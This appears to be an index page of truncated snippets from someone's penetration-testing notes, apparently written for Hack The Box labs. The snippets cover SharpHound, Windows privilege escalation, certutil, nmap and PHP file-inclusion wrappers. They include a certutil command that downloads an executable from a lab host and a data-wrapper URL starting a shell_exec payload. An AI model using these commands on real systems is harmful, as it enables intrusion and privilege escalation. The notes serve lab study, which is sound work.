Sharphound.exe First upload Sharphound to the system and then run the following commands from a folder where you can write as it will download a .zip file: # For SharpHound.ps1 (each line is a comm...

#Note It is possible that sometimes you need to use the host domain (e.g. sizzle.htb) NTPDATE ntpdate 10.10.11.102 RDATE rdate -n 10.10.11.102 DATE It is also possible to set the date “manually” ...

User create If we are able to create a user it is as simple as using the net.exe windows utility: net user shuciran shucir4n /add Add user to a group If there is a group in the domain with some pr...

Another interesting attack vector that can lead to privilege escalation on Windows operating systems revolves around unquoted service paths. We can use this attack when we have write permissions to...

Even while logged in as an administrative user, the account will have two security tokens, one running at a medium integrity level and the other at high integrity level. UAC acts as the separation ...

certutil.exe -urlcache -f http://10.0.0.5/40564.exe C:\Windows\Temp\bad.exe Example: [[Forest#^8fde0e]] # Dump general information certutil -dump # Dump information about certificate authority ce...

System information systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" systeminfo | findstr /C:"sistema" #Español Installed updates wmic qfe get Caption, Description Installed ...

Scan Network Range Shuciran@htb[/htb]$ sudo nmap 10.129.2.0/24 -sn -oA tnet | grep for | cut -d" " -f5 10.129.2.4 10.129.2.10 10.129.2.11 10.129.2.18 10.129.2.19 10.129.2.20 10.129.2.28 Nmap Styl...

Port Type Usage 20 TCP FTP Data 21 TCP FTP Control 22 TCP/UDP Secure Shell (SSH)...

Wrappers data Represent a string on the web page http://10.11.0.22/menu.php?file=data:text/plain,hello world Shell with data http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_ex...